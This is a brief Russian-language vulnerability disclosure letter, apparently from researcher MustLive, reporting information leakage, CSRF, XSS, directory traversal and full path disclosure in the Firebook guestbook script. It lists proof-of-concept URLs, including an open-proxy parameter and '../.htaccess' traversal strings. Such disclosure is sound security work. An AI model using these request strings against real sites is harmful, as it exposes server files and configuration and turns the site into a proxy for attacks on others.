Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Information Leakage, Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal и Full path disclosure уязвимостях в
Firebook.
Information Leakage:
http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;
CSRF:
http://site/path_to_firebook_admin/?URLproxy=http://firebook.ru/env/index.html;
Возможны CSRF-атаки на другие сайты.
XSS:
Directory Traversal:
http://site/path_to_firebook_admin/?param=1;show=../.htaccess;
http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html
Full path disclosure:
http://site/path_to_firebook_admin/?param=1;show=param.txt;
http://site/guestbook/index.html?answer=guestbook/guest/1
Уязвимы все версии Firebook.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4124/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua